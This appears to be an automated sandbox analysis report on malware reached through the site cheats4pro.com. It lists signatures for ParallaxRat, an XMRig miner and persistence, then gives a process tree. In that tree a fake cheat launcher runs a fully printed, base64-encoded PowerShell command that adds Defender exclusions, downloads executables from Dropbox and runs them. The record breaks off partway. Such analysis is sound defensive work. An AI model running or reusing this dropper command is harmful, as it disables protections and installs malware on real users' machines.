Analysis

  • max time kernel
    247s
  • max time network
    295s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20230220-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20230220-enlocale:en-usos:windows10-2004-x64system
  • submitted
    13-05-2023 18:51

General

  • Target

    http://cheats4pro.com

Malware Config

Signatures

  • Modifies WinLogon for persistence 2 TTPs 1 IoCs
  • ParallaxRat

    ParallaxRat is a multipurpose RAT written in MASM.

  • Suspicious use of NtCreateUserProcessOtherParentProcess 4 IoCs
  • xmrig

    XMRig is a high performance, open source, cross platform CPU/GPU miner.

  • XMRig Miner payload 3 IoCs
  • Blocklisted process makes network request 1 IoCs
  • Downloads MZ/PE file
  • Drops file in Drivers directory 1 IoCs
  • Stops running service(s) 3 TTPs
  • Checks computer location settings 2 TTPs 2 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Executes dropped EXE 5 IoCs
  • Reads user/profile data of web browsers 2 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

  • Adds Run key to start application 2 TTPs 1 IoCs
  • Legitimate hosting services abused for malware hosting/C2 1 TTPs
  • Drops file in System32 directory 3 IoCs
  • Suspicious use of SetThreadContext 3 IoCs
  • Launches sc.exe 5 IoCs

    Sc.exe is a Windows utlilty to control services on the system.

  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Program crash 4 IoCs
  • Checks processor information in registry 2 TTPs 6 IoCs

    Processor information is often read in order to detect sandboxing environments.

  • Creates scheduled task(s) 1 TTPs 1 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

  • Enumerates system info in registry 2 TTPs 7 IoCs
  • Modifies data under HKEY_USERS 2 IoCs
  • Modifies registry class 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious behavior: LoadsDriver 1 IoCs
  • Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 11 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of FindShellTrayWindow 48 IoCs
  • Suspicious use of SendNotifyMessage 34 IoCs
  • Suspicious use of SetWindowsHookEx 1 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs

Processes

  • C:\Windows\system32\lsass.exe
    C:\Windows\system32\lsass.exe
    1⤵
      PID:668
    • C:\Windows\system32\winlogon.exe
      winlogon.exe
      1⤵
        PID:612
        • C:\Windows\system32\dwm.exe
          "dwm.exe"
          2⤵
            PID:316
        • C:\Windows\System32\svchost.exe
          C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s lmhosts
          1⤵
            PID:728
          • C:\Windows\system32\svchost.exe
            C:\Windows\system32\svchost.exe -k netsvcs -p -s gpsvc
            1⤵
              PID:516
            • C:\Windows\system32\svchost.exe
              C:\Windows\system32\svchost.exe -k netsvcs -p -s ProfSvc
              1⤵
                PID:1192
              • C:\Windows\System32\svchost.exe
                C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s EventLog
                1⤵
                • Drops file in System32 directory
                PID:1272
              • C:\Windows\System32\svchost.exe
                C:\Windows\System32\svchost.exe -k netsvcs -p -s Themes
                1⤵
                  PID:1424
                • C:\Windows\system32\svchost.exe
                  C:\Windows\system32\svchost.exe -k LocalService -p -s nsi
                  1⤵
                    PID:1464
                  • C:\Windows\system32\svchost.exe
                    C:\Windows\system32\svchost.exe -k netsvcs -p -s SENS
                    1⤵
                      PID:1596
                    • C:\Windows\System32\svchost.exe
                      C:\Windows\System32\svchost.exe -k NetworkService -p -s NlaSvc
                      1⤵
                        PID:1660
                      • C:\Windows\system32\svchost.exe
                        C:\Windows\system32\svchost.exe -k NetworkService -p -s Dnscache
                        1⤵
                          PID:1864
                        • C:\Windows\System32\svchost.exe
                          C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p
                          1⤵
                            PID:1876
                          • C:\Windows\System32\svchost.exe
                            C:\Windows\System32\svchost.exe -k netsvcs -p -s ShellHWDetection
                            1⤵
                              PID:1952
                            • C:\Windows\system32\svchost.exe
                              C:\Windows\system32\svchost.exe -k appmodel -p -s StateRepository
                              1⤵
                                PID:1960
                              • C:\Windows\System32\svchost.exe
                                C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p
                                1⤵
                                  PID:1792
                                • C:\Windows\System32\svchost.exe
                                  C:\Windows\System32\svchost.exe -k NetworkService -p -s LanmanWorkstation
                                  1⤵
                                    PID:2064
                                  • C:\Windows\System32\svchost.exe
                                    C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -s RmSvc
                                    1⤵
                                      PID:2124
                                    • C:\Windows\system32\svchost.exe
                                      C:\Windows\system32\svchost.exe -k NetworkServiceNetworkRestricted -p -s PolicyAgent
                                      1⤵
                                        PID:2320
                                      • C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe
                                        "C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe" /service
                                        1⤵
                                          PID:2448
                                        • C:\Windows\system32\svchost.exe
                                          C:\Windows\system32\svchost.exe -k NetworkService -p -s CryptSvc
                                          1⤵
                                            PID:2456
                                          • C:\Windows\system32\svchost.exe
                                            C:\Windows\system32\svchost.exe -k netsvcs -p -s IKEEXT
                                            1⤵
                                              PID:2328
                                            • C:\Windows\sysmon.exe
                                              C:\Windows\sysmon.exe
                                              1⤵
                                                PID:2512
                                              • C:\Windows\system32\sihost.exe
                                                sihost.exe
                                                1⤵
                                                  PID:2484
                                                • C:\Windows\system32\svchost.exe
                                                  C:\Windows\system32\svchost.exe -k UnistackSvcGroup -s CDPUserSvc
                                                  1⤵
                                                    PID:2520
                                                  • C:\Windows\System32\svchost.exe
                                                    C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s TrkWks
                                                    1⤵
                                                      PID:2556
                                                    • C:\Windows\system32\svchost.exe
                                                      C:\Windows\system32\svchost.exe -k netsvcs -p -s Winmgmt
                                                      1⤵
                                                        PID:2572
                                                      • C:\Windows\system32\svchost.exe
                                                        C:\Windows\system32\svchost.exe -k netsvcs -p -s LanmanServer
                                                        1⤵
                                                          PID:2580
                                                        • C:\Windows\System32\spoolsv.exe
                                                          C:\Windows\System32\spoolsv.exe
                                                          1⤵
                                                            PID:1284
                                                          • C:\Windows\system32\svchost.exe
                                                            C:\Windows\system32\svchost.exe -k netsvcs -p -s WpnService
                                                            1⤵
                                                              PID:2596
                                                            • C:\Windows\system32\wbem\unsecapp.exe
                                                              C:\Windows\system32\wbem\unsecapp.exe -Embedding
                                                              1⤵
                                                                PID:8
                                                              • C:\Windows\System32\RuntimeBroker.exe
                                                                C:\Windows\System32\RuntimeBroker.exe -Embedding
                                                                1⤵
                                                                  PID:3708
                                                                • C:\Windows\system32\DllHost.exe
                                                                  C:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}
                                                                  1⤵
                                                                    PID:3404
                                                                    • C:\Windows\system32\WerFault.exe
                                                                      C:\Windows\system32\WerFault.exe -u -p 3404 -s 844
                                                                      2⤵
                                                                      • Program crash
                                                                      • Checks processor information in registry
                                                                      • Enumerates system info in registry
                                                                      PID:4624
                                                                  • C:\Windows\system32\svchost.exe
                                                                    C:\Windows\system32\svchost.exe -k LocalService -p -s CDPSvc
                                                                    1⤵
                                                                      PID:1900
                                                                    • C:\Windows\System32\svchost.exe
                                                                      C:\Windows\System32\svchost.exe -k netsvcs -p
                                                                      1⤵
                                                                        PID:4464
                                                                      • C:\Windows\system32\svchost.exe
                                                                        C:\Windows\system32\svchost.exe -k LocalService -s W32Time
                                                                        1⤵
                                                                          PID:4816
                                                                        • C:\Windows\System32\svchost.exe
                                                                          C:\Windows\System32\svchost.exe -k LocalService -p -s LicenseManager
                                                                          1⤵
                                                                            PID:4236
                                                                          • C:\Windows\system32\SppExtComObj.exe
                                                                            C:\Windows\system32\SppExtComObj.exe -Embedding
                                                                            1⤵
                                                                              PID:4584
                                                                            • C:\Windows\system32\svchost.exe
                                                                              C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s WinHttpAutoProxySvc
                                                                              1⤵
                                                                                PID:3684
                                                                              • C:\Windows\System32\svchost.exe
                                                                                C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s StorSvc
                                                                                1⤵
                                                                                  PID:404
                                                                                • C:\Windows\System32\RuntimeBroker.exe
                                                                                  C:\Windows\System32\RuntimeBroker.exe -Embedding
                                                                                  1⤵
                                                                                    PID:4956
                                                                                  • C:\Windows\System32\RuntimeBroker.exe
                                                                                    C:\Windows\System32\RuntimeBroker.exe -Embedding
                                                                                    1⤵
                                                                                      PID:4028
                                                                                    • C:\Windows\system32\DllHost.exe
                                                                                      C:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}
                                                                                      1⤵
                                                                                        PID:3500
                                                                                        • C:\Windows\system32\WerFault.exe
                                                                                          C:\Windows\system32\WerFault.exe -u -p 3500 -s 944
                                                                                          2⤵
                                                                                          • Program crash
                                                                                          • Checks processor information in registry
                                                                                          • Enumerates system info in registry
                                                                                          PID:756
                                                                                      • C:\Windows\system32\svchost.exe
                                                                                        C:\Windows\system32\svchost.exe -k ClipboardSvcGroup -p -s cbdhsvc
                                                                                        1⤵
                                                                                          PID:3300
                                                                                        • C:\Windows\Explorer.EXE
                                                                                          C:\Windows\Explorer.EXE
                                                                                          1⤵
                                                                                          • Suspicious use of SetWindowsHookEx
                                                                                          PID:3120
                                                                                          • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                            "C:\Program Files\Google\Chrome\Application\chrome.exe" "--simulate-outdated-no-au='Tue, 31 Dec 2099 23:59:59 GMT'" http://cheats4pro.com
                                                                                            2⤵
                                                                                            • Adds Run key to start application
                                                                                            • Enumerates system info in registry
                                                                                            • Modifies data under HKEY_USERS
                                                                                            • Modifies registry class
                                                                                            • Suspicious behavior: EnumeratesProcesses
                                                                                            • Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
                                                                                            • Suspicious use of AdjustPrivilegeToken
                                                                                            • Suspicious use of FindShellTrayWindow
                                                                                            • Suspicious use of SendNotifyMessage
                                                                                            • Suspicious use of WriteProcessMemory
                                                                                            PID:4692
                                                                                            • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                              "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=106.0.5249.119 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7ffa91569758,0x7ffa91569768,0x7ffa91569778
                                                                                              3⤵
                                                                                                PID:3200
                                                                                              • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --gpu-preferences=UAAAAAAAAADgAAAYAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAEgAAAAAAAAASAAAAAAAAAAYAAAAAgAAABAAAAAAAAAAGAAAAAAAAAAQAAAAAAAAAAAAAAAOAAAAEAAAAAAAAAABAAAADgAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=1768 --field-trial-handle=1796,i,13115259455748310131,17749406248646161064,131072 /prefetch:2
                                                                                                3⤵
                                                                                                  PID:2660
                                                                                                • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2148 --field-trial-handle=1796,i,13115259455748310131,17749406248646161064,131072 /prefetch:8
                                                                                                  3⤵
                                                                                                    PID:3872
                                                                                                  • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=1272 --field-trial-handle=1796,i,13115259455748310131,17749406248646161064,131072 /prefetch:8
                                                                                                    3⤵
                                                                                                      PID:4520
                                                                                                    • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                      "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --enable-chrome-cart --first-renderer-process --lang=en-US --device-scale-factor=1 --num-raster-threads=2 --enable-main-frame-before-activation --renderer-client-id=6 --mojo-platform-channel-handle=2928 --field-trial-handle=1796,i,13115259455748310131,17749406248646161064,131072 /prefetch:1
                                                                                                      3⤵
                                                                                                        PID:2304
                                                                                                      • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --enable-chrome-cart --lang=en-US --device-scale-factor=1 --num-raster-threads=2 --enable-main-frame-before-activation --renderer-client-id=5 --mojo-platform-channel-handle=2944 --field-trial-handle=1796,i,13115259455748310131,17749406248646161064,131072 /prefetch:1
                                                                                                        3⤵
                                                                                                          PID:2900
                                                                                                        • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                          "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --enable-chrome-cart --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=2 --enable-main-frame-before-activation --renderer-client-id=7 --mojo-platform-channel-handle=4396 --field-trial-handle=1796,i,13115259455748310131,17749406248646161064,131072 /prefetch:1
                                                                                                          3⤵
                                                                                                            PID:620
                                                                                                          • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                            "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --enable-chrome-cart --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=2 --enable-main-frame-before-activation --renderer-client-id=8 --mojo-platform-channel-handle=3280 --field-trial-handle=1796,i,13115259455748310131,17749406248646161064,131072 /prefetch:1
                                                                                                            3⤵
                                                                                                              PID:3516
                                                                                                            • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                              "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=5092 --field-trial-handle=1796,i,13115259455748310131,17749406248646161064,131072 /prefetch:8
                                                                                                              3⤵
                                                                                                                PID:2672
                                                                                                              • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --enable-chrome-cart --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=2 --enable-main-frame-before-activation --renderer-client-id=10 --mojo-platform-channel-handle=5224 --field-trial-handle=1796,i,13115259455748310131,17749406248646161064,131072 /prefetch:1
                                                                                                                3⤵
                                                                                                                  PID:1812
                                                                                                                • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.ProcessorMetrics --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5196 --field-trial-handle=1796,i,13115259455748310131,17749406248646161064,131072 /prefetch:8
                                                                                                                  3⤵
                                                                                                                    PID:2536
                                                                                                                  • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5600 --field-trial-handle=1796,i,13115259455748310131,17749406248646161064,131072 /prefetch:8
                                                                                                                    3⤵
                                                                                                                      PID:4112
                                                                                                                    • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                      "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --enable-chrome-cart --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=2 --enable-main-frame-before-activation --renderer-client-id=13 --mojo-platform-channel-handle=5220 --field-trial-handle=1796,i,13115259455748310131,17749406248646161064,131072 /prefetch:1
                                                                                                                      3⤵
                                                                                                                        PID:4680
                                                                                                                      • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --enable-chrome-cart --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=2 --enable-main-frame-before-activation --renderer-client-id=14 --mojo-platform-channel-handle=4616 --field-trial-handle=1796,i,13115259455748310131,17749406248646161064,131072 /prefetch:1
                                                                                                                        3⤵
                                                                                                                          PID:2232
                                                                                                                        • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                          "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5168 --field-trial-handle=1796,i,13115259455748310131,17749406248646161064,131072 /prefetch:8
                                                                                                                          3⤵
                                                                                                                            PID:2812
                                                                                                                          • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                            "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --enable-chrome-cart --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=2 --enable-main-frame-before-activation --renderer-client-id=16 --mojo-platform-channel-handle=3928 --field-trial-handle=1796,i,13115259455748310131,17749406248646161064,131072 /prefetch:1
                                                                                                                            3⤵
                                                                                                                              PID:4348
                                                                                                                            • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                              "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --enable-chrome-cart --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=2 --enable-main-frame-before-activation --renderer-client-id=17 --mojo-platform-channel-handle=5512 --field-trial-handle=1796,i,13115259455748310131,17749406248646161064,131072 /prefetch:1
                                                                                                                              3⤵
                                                                                                                                PID:3660
                                                                                                                              • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --enable-chrome-cart --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=2 --enable-main-frame-before-activation --renderer-client-id=18 --mojo-platform-channel-handle=3108 --field-trial-handle=1796,i,13115259455748310131,17749406248646161064,131072 /prefetch:1
                                                                                                                                3⤵
                                                                                                                                  PID:4488
                                                                                                                                • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --enable-chrome-cart --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=2 --enable-main-frame-before-activation --renderer-client-id=19 --mojo-platform-channel-handle=6028 --field-trial-handle=1796,i,13115259455748310131,17749406248646161064,131072 /prefetch:1
                                                                                                                                  3⤵
                                                                                                                                    PID:1180
                                                                                                                                  • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=5236 --field-trial-handle=1796,i,13115259455748310131,17749406248646161064,131072 /prefetch:8
                                                                                                                                    3⤵
                                                                                                                                      PID:2008
                                                                                                                                    • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                      "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=3156 --field-trial-handle=1796,i,13115259455748310131,17749406248646161064,131072 /prefetch:8
                                                                                                                                      3⤵
                                                                                                                                        PID:1612
                                                                                                                                      • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --disable-gpu-sandbox --use-gl=disabled --gpu-vendor-id=5140 --gpu-device-id=140 --gpu-sub-system-id=0 --gpu-revision=0 --gpu-driver-version=10.0.19041.546 --gpu-preferences=UAAAAAAAAADoAAAYAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAACQAAAAAAAAAAAAAAAAAAAAAAAAAEgAAAAAAAAASAAAAAAAAAAYAAAAAgAAABAAAAAAAAAAGAAAAAAAAAAQAAAAAAAAAAAAAAAOAAAAEAAAAAAAAAABAAAADgAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2748 --field-trial-handle=1796,i,13115259455748310131,17749406248646161064,131072 /prefetch:2
                                                                                                                                        3⤵
                                                                                                                                        • Suspicious behavior: EnumeratesProcesses
                                                                                                                                        PID:5112
                                                                                                                                    • C:\Program Files\7-Zip\7zG.exe
                                                                                                                                      "C:\Program Files\7-Zip\7zG.exe" x -o"C:\Users\Admin\Downloads\" -an -ai#7zMap4979:84:7zEvent5635
                                                                                                                                      2⤵
                                                                                                                                      • Suspicious use of FindShellTrayWindow
                                                                                                                                      PID:2192
                                                                                                                                    • C:\Users\Admin\Downloads\C4PROLauncher.exe
                                                                                                                                      "C:\Users\Admin\Downloads\C4PROLauncher.exe"
                                                                                                                                      2⤵
                                                                                                                                      • Checks computer location settings
                                                                                                                                      • Executes dropped EXE
                                                                                                                                      PID:4348
                                                                                                                                      • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                        "C:\Windows\System32\cmd.exe" /c powershell -ENC cwBlAHQALQBtAHAAcAByAGUAZgBlAHIAZQBuAGMAZQAgAC0AZQB4AGMAbAB1AHMAaQBvAG4AcABhAHQAaAAgAEMAOgBcAA==
                                                                                                                                        3⤵
                                                                                                                                          PID:1084
                                                                                                                                          • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                            powershell -ENC cwBlAHQALQBtAHAAcAByAGUAZgBlAHIAZQBuAGMAZQAgAC0AZQB4AGMAbAB1AHMAaQBvAG4AcABhAHQAaAAgAEMAOgBcAA==
                                                                                                                                            4⤵
                                                                                                                                            • Suspicious behavior: EnumeratesProcesses
                                                                                                                                            PID:2008
                                                                                                                                        • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                          "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHQAawBtACMAPgAgAEEAZABkAC0ATQBwAFAAcgBlAGYAZQByAGUAbgBjAGUAIAA8ACMAegBrAGEAIwA+ACAALQBFAHgAYwBsAHUAcwBpAG8AbgBQAGEAdABoACAAQAAoACQAZQBuAHYAOgBVAHMAZQByAFAAcgBvAGYAaQBsAGUALAAkAGUAbgB2ADoAUwB5AHMAdABlAG0ARAByAGkAdgBlACkAIAA8ACMAbQB3AGoAIwA+ACAALQBGAG8AcgBjAGUAIAA8ACMAcABrAHoAIwA+ADsAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwBhAGQARgBpAGwAZQAoACcAaAB0AHQAcABzADoALwAvAGQAbAAuAGQAcgBvAHAAYgBvAHgAdQBzAGUAcgBjAG8AbgB0AGUAbgB0AC4AYwBvAG0ALwBzAC8ANwA2AG0ANgB4AHAAawA0AGMAZgB3ADYAdQAzAGwALwBDADQATABvAGEAZABlAHIALgBlAHgAZQAnACwAIAA8ACMAeQBjAGoAIwA+ACAAKABKAG8AaQBuAC0AUABhAHQAaAAgADwAIwB0AG4AYwAjAD4AIAAtAFAAYQB0AGgAIAAkAGUAbgB2ADoAVABlAG0AcAAgADwAIwB5AHgAdwAjAD4AIAAtAEMAaABpAGwAZABQAGEAdABoACAAJwBDADQATABvAGEAZABlAHIALgBlAHgAZQAnACkAKQA8ACMAYQB5AHAAIwA+ADsAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABTAHkAcwB0AGUAbQAuAE4AZQB0AC4AVwBlAGIAQwBsAGkAZQBuAHQAKQAuAEQAbwB3AG4AbABvAGEAZABGAGkAbABlACgAJwBoAHQAdABwAHMAOgAvAC8AZABsAC4AZAByAG8AcABiAG8AeAB1AHMAZQByAGMAbwBuAHQAZQBuAHQALgBjAG8AbQAvAHMALwB2AHgAYgBxAHkAaQBrAHUAZQBkAHQANgB0ADEAMgAvAEEAZAB2AGEAbgBjAGUAZABEAGUAZgBlAG4AZABlAHIALgBlAHgAZQAnACwAIAA8ACMAagBwAHkAIwA+ACAAKABKAG8AaQBuAC0AUABhAHQAaAAgADwAIwBsAGQAYwAjAD4AIAAtAFAAYQB0AGgAIAAkAGUAbgB2ADoAVABlAG0AcAAgADwAIwB5AGUAbQAjAD4AIAAtAEMAaABpAGwAZABQAGEAdABoACAAJwBBAGQAdgBhAG4AYwBlAGQARABlAGYAZQBuAGQAZQByAC4AZQB4AGUAJwApACkAPAAjAGEAegBiACMAPgA7ACAAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwBhAGQARgBpAGwAZQAoACcAaAB0AHQAcABzADoALwAvAGQAbAAuAGQAcgBvAHAAYgBvAHgAdQBzAGUAcgBjAG8AbgB0AGUAbgB0AC4AYwBvAG0ALwBzAC8AdwBnADQANwAwAHAANgBzAGkAegAxADgAbQBtAGwALwBTAHkAcwBBAHAAcAAuAGUAeABlACcALAAgADwAIwBoAHQAZQAjAD4AIAAoAEoAbwBpAG4ALQBQAGEAdABoACAAPAAjAG4AZgBpACMAPgAgAC0AUABhAHQAaAAgACQAZQBuAHYAOgBUAGUAbQBwACAAPAAjAGoAcQB0ACMAPgAgAC0AQwBoAGkAbABkAFAAYQB0AGgAIAAnAFMAeQBzAEEAcABwAC4AZQB4AGUAJwApACkAPAAjAHEAbABjACMAPgA7ACAAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwBhAGQARgBpAGwAZQAoACcAaAB0AHQAcABzADoALwAvAGQAbAAuAGQAcgBvAHAAYgBvAHgAdQBzAGUAcgBjAG8AbgB0AGUAbgB0AC4AYwBvAG0ALwBzAC8AYgBrAHQAMgBoAG8AdgA5AGgAegB2AHQAdABuADUALwAxAC4AZQB4AGUAJwAsACAAPAAjAGoAegB6ACMAPgAgACgASgBvAGkAbgAtAFAAYQB0AGgAIAA8ACMAbQBqAGoAIwA+ACAALQBQAGEAdABoACAAJABlAG4AdgA6AFQAZQBtAHAAIAA8ACMAcABrAGwAIwA+ACAALQBDAGgAaQBsAGQAUABhAHQAaAAgACcAMQAuAGUAeABlACcAKQApADwAIwByAHQAYQAjAD4AOwAgAFMAdABhAHIAdAAtAFAAcgBvAGMAZQBzAHMAIAAtAEYAaQBsAGUAUABhAHQAaAAgADwAIwBuAHkAcQAjAD4AIAAoAEoAbwBpAG4ALQBQAGEAdABoACAALQBQAGEAdABoACAAJABlAG4AdgA6AFQAZQBtAHAAIAA8ACMAdABjAHEAIwA+ACAALQBDAGgAaQBsAGQAUABhAHQAaAAgACcAQwA0AEwAbwBhAGQAZQByAC4AZQB4AGUAJwApADwAIwBkAGEAYQAjAD4AOwAgAFMAdABhAHIAdAAtAFAAcgBvAGMAZQBzAHMAIAAtAEYAaQBsAGUAUABhAHQAaAAgADwAIwBlAHAAYgAjAD4AIAAoAEoAbwBpAG4ALQBQAGEAdABoACAALQBQAGEAdABoACAAJABlAG4AdgA6AFQAZQBtAHAAIAA8ACMAaQBxAHkAIwA+ACAALQBDAGgAaQBsAGQAUABhAHQAaAAgACcAQQBkAHYAYQBuAGMAZQBkAEQAZQBmAGUAbgBkAGUAcgAuAGUAeABlACcAKQA8ACMAawB6AG4AIwA+ADsAIABTAHQAYQByAHQALQBQAHIAbwBjAGUAcwBzACAALQBGAGkAbABlAFAAYQB0AGgAIAA8ACMAdABuAG4AIwA+ACAAKABKAG8AaQBuAC0AUABhAHQAaAAgAC0AUABhAHQAaAAgACQAZQBuAHYAOgBUAGUAbQBwACAAPAAjAGwAZwBqACMAPgAgAC0AQwBoAGkAbABkAFAAYQB0AGgAIAAnAFMAeQBzAEEAcABwAC4AZQB4AGUAJwApADwAIwBhAHoAdAAjAD4AOwAgAFMAdABhAHIAdAAtAFAAcgBvAGMAZQBzAHMAIAAtAEYAaQBsAGUAUABhAHQAaAAgADwAIwBtAGMAdgAjAD4AIAAoAEoAbwBpAG4ALQBQAGEAdABoACAALQBQAGEAdABoACAAJABlAG4AdgA6AFQAZQBtAHAAIAA8ACMAdQB5AHgAIwA+ACAALQBDAGgAaQBsAGQAUABhAHQAaAAgACcAMQAuAGUAeABlACcAKQA8ACMAdQBuAHAAIwA+AA=="
                                                                                                                                          3⤵
                                                                                                                                          • Blocklisted process makes network request
                                                                                                                                          • Suspicious behavior: EnumeratesProcesses
                                                                                                                                          PID:4536
                                                                                                                                          • C:\Users\Admin\AppData\Local\Temp\C4Loader.exe
